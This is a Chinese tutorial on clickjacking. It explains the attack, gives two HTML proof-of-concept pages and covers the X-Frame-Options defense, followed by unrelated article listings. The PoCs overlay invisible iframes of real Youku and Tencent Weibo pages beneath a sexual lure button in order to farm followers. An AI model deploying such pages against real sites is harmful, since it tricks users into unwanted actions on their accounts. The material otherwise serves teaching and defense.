什么是点击劫持

点击劫持,clickjacking,也被称为UI-覆盖攻击。这个词首次出现在2008年,是由互联网安全专家罗伯特·汉森和耶利米·格劳斯曼首创的。

它是通过覆盖不可见的框架误导受害者点击。

虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面

劫持原理

攻击者使用一个透明的、不可见的iframe,覆盖(包含)一个网页,然后诱使用户在该网页上进行操作,此时用户在不知情的情况下点击了透明的iframe页面。通过调整iframe页面的按钮位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上。

劫持案例

  1. 点击一个表面显示是“播放”某个视频的按钮,而实际上完成的操作却是将用户的社交网站个人信息改为“公开”状态。
  2. 通过图片覆盖导致链接到一些未知的网站

    思路即为,找到有用的地方,查到坐标,放置按钮,放置诱惑信息,OK!

代码示例

优酷频道刷粉的POC

  1. <!DOCTYPE html>
    2. 

  2. <html>
    3. 

    4. 

  4. <head>
    5. 

  5.     http-equiv="Content-Type" content="text/html; charset=utf-8" />
    6. 

  6.     <title>点击劫持 POC</title>
    7. 

  7.     <style>
    8. 

  8.     iframe {
    9. 

  9.         width: 1440px;
    10. 

  10.         height: 900px;
    11. 

  11.         position: absolute;
    12. 

  12.         top: 0;
    13. 

  13.         left: 0;
    14. 

  14.         z-index: 2;
    15. 

  15.         -moz-opacity: 0;
    16. 

  16.         opacity: 0;
    17. 

  17.         filter: alpha(opacity=0)
    18. 

  18.     }
    19. 

    20. 

  20.     button {
    21. 

  21.         position: absolute;
    22. 

  22.         top: 230px;
    23. 

  23.         left: 1200px;
    24. 

  24.         z-index: 1;
    25. 

  25.         width: 80px;
    26. 

  26.         height: 20px
    27. 

  27.     }
    28. 

  28.     </style>
    29. 

  29. </head>
    30. 

    31. 

  31. <body>
    32. 

  32.     <button>点击脱衣</button>
    33. 

  33.     <img src="http://b.hiphotos.baidu.com/image/pic/item/3ac79f3df8dcd1001341dbcd768b4710b8122f78.jpg" />
    34. 

  34.     <iframe src="http://i.youku.com/u/UMjA0NTg4Njcy" scrolling="no"> </iframe>
    35. 

  35. </body>
    36. 

    37. 

  37. </html>

腾讯微博刷粉

  1. <html>
    2. 

    3. 

  3. <head>
    4. 

  4.     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    5. 

  5.     <title>点击劫持 POC</title>
    6. 

  6.     <style>
    7. 

  7.     iframe {
    8. 

  8.         width: 1440px;
    9. 

  9.         height: 900px;
    10. 

  10.         position: absolute;
    11. 

  11.         top: -0px;
    12. 

  12.         left: -0px;
    13. 

  13.         z-index: 2;
    14. 

  14.         -moz-opacity: 0;
    15. 

  15.         opacity: 0;
    16. 

  16.         filter: alpha(opacity=0);
    17. 

  17.     }
    18. 

    19. 

  19.     button {
    20. 

  20.         position: absolute;
    21. 

  21.         top: 250px;
    22. 

  22.         left: 770px;
    23. 

  23.         z-index: 1;
    24. 

  24.         width: 80px;
    25. 

  25.         height: 20px;
    26. 

  26.     }
    27. 

  27.     </style>
    28. 

  28. </head>
    29. 

    30. 

  30. <body>
    31. 

  31.     <button>点击脱衣</button>
    32. 

  32.     <img src="http://b.hiphotos.baidu.com/image/pic/item/3ac79f3df8dcd1001341dbcd768b4710b8122f78.jpg" />
    33. 

  33.     <iframe src="http://search.t.qq.com/user.php?pos=436&amp;k=东北保钓" scrolling="no"></iframe>
    34. 

  34. </body>
    35. 

    36. 

  36. </html>

防御

X-FRAME-OPTIONS是目前最可靠的方法

X-FRAME-OPTIONS是微软提出的一个http头,专门用来防御利用iframe嵌套的点击劫持攻击。

并且在IE8、Firefox3.6、Chrome4以上的版本均能很好的支持。

这个头有三个值:

  1. DENY // 拒绝任何域加载
    2. 

  2. SAMEORIGIN // 允许同源域下加载
    3. 

  3. ALLOW-FROM // 可以定义允许frame加载的页面地址

参考:

http://www.freebuf.com/articles/web/67843.html

点击劫持(click jacking)的更多相关文章

  1. web安全:click jacking

    点击劫持  click jacking通过iframe加载被攻击网站到黑客自己维护的网站通过z-index叠加和position定位,将2个网站的信息堆叠在一个立体投影面上,通过opacity设置透明 ...

  2. 点击劫持(CLICKJACKING)与X-FRAME-OPTIONS HEADER

    转载: http://www.tuicool.com/articles/mqUBfa 目录 前言 1.1 点击劫持(clickjacking attacks) 1.2  Frame Bursters. ...

  3. XSS学习笔记(一个)-点击劫持

    所谓XSS这个场景被触发XSS地方,在大多数情况下,攻击者被嵌入在网页中(问题)该恶意脚本(Cross site Scripting),这里的攻击始终触发浏览器端,攻击的者的目的.一般都是获取用户的C ...

  4. 点击劫持漏洞之理解 python打造一个挖掘点击劫持漏洞的脚本

    前言: 放假了,上个星期刚刚学习完点击劫持漏洞.没来的及写笔记,今天放学总结了一下 并写了一个检测点击劫持的脚本.点击劫持脚本说一下哈.= =原本是打算把网站源码 中的js也爬出来将一些防御的代码匹配 ...

  5. Web应用安全之点击劫持(CLICKJACKING)与X-FRAME-OPTIONS HEADER

    点击劫持(clickjacking)与X-Frame-Options Header 文/玄魂 目录 前言... 1.1 点击劫持(clickjacking attacks)... 1.2  Frame ...

  6. Web安全之点击劫持(ClickJacking)

    点击劫持(ClickJacking)是一种视觉上的欺骗手段.大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点击透明的 ...

  7. ClickJacking(点击劫持)

    问题: 点击劫持(ClickJacking)是一种视觉上的欺骗手段.大概有两种方式,一是攻击者使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,此时用户将在不知情的情况下点 ...

  8. Cookie中设置了 HttpOnly,Secure 属性,有效的防止XSS攻击,X-Frame-Options 响应头避免点击劫持

    属性介绍: 1) secure属性当设置为true时,表示创建的 Cookie 会被以安全的形式向服务器传输(ssl),即 只能在 HTTPS 连接中被浏览器传递到服务器端进行会话验证, 如果是 HT ...

  9. 安全测试4_客户端的安全漏洞(XSS、CSRF、点击劫持、URL跳转)

    那个fanh前面学习的都是基础,现在开始正式学习下安全的知识,这一章主要讲解客户端常见的安全漏洞. 看到这个不错,给大家记一下: 1.常见的安全事件: 2.XSS(跨站脚本),英文全称:Cross S ...

随机推荐

  1. mysql数据库引擎MyISAM与InnoDB的区别浅说

    mysql的存储引擎包括:MyISAM.InnoDB.BDB.MEMORY.MERGE.EXAMPLE.NDBCluster.ARCHIVE.CSV.BLACKHOLE.FEDERATED等,其中In ...

  2. Java 栈与堆简介

    一.前言 长久以来,一直被Java的内存分配问题,堆和栈问题困扰好久,面试的时候也非常心虚,这几天好好通过看书和技术博客来整理了一下,希望能找到我自己的理解方式. 二.内存 内存分物理内存和虚拟内存, ...

  3. GithubPage自定义腾讯404界面

    思路来源 之前看到腾讯网络的404和github自带的404,反差很大,于是想自己弄一个了. 过程 github的404一点也不复杂,只是需要在根目录添加一个404.html的文档,或者404.md的 ...

  4. 常见的MIME

    "css": "text/css", "gif": "image/gif", "html": &qu ...

  5. CSS 实现等高布局以及多行文本垂直居中

    将display属性设置为table-cell,具有table的特点. 1.同行等高. 2.宽度自动调节. 相当于表格是td, <style type="text/css"& ...

  6. 深入理解java虚拟机(三)对象回收判断算法以及死亡过程

    在堆里面存放着Java几乎所有的对象实例,垃圾收集器要进行垃圾回收,要做的第一步便是找出那些对象是需要回收的. 怎么判断对象是否需要回收? 常用的方法有两种. 1.引用计数算法.为每一个对象添加一个引 ...

  7. 介绍自己以及github注册流程

    我叫何季生,来自网络工程141,学号是1413042027,我喜欢看一些动漫和游戏,对于编程并不是很厉害希望今年能够有所突破. github注册流程:在刚开始注册github时,我用的是qq浏览器,却 ...

  8. JAVA IO总结及socket简单实现

    为了方便理解与阐述,先引入两张图: a.Java IO中常用的类 在整个Java.io包中最重要的就是5个类和一个接口.5个类指的是File.OutputStream.InputStream.Writ ...

  9. 自己动手设计并实现一个linux嵌入式UI框架(设计)

    看了"自己动手设计并实现一个linux嵌入式UI框架"显然没有尽兴,因为还没有看到庐山真面目,那我今天继续,先来说说,我用到了哪些知识背景.如:C语言基础知识,尤其是指针.函数指针 ...

  10. 反省在北京某S2B2C电商小型公司面试时掉链子的问题

    昨天,参与北京一家公司面试时,不知道为什么,错了很多题,这些题在该家公司之前已经被问很多次了,当天精神恍惚的没答上来或答错,被问到数据库优化和乐观锁的问题,首先我谈到了存储引擎底层的数据结构 B树/B ...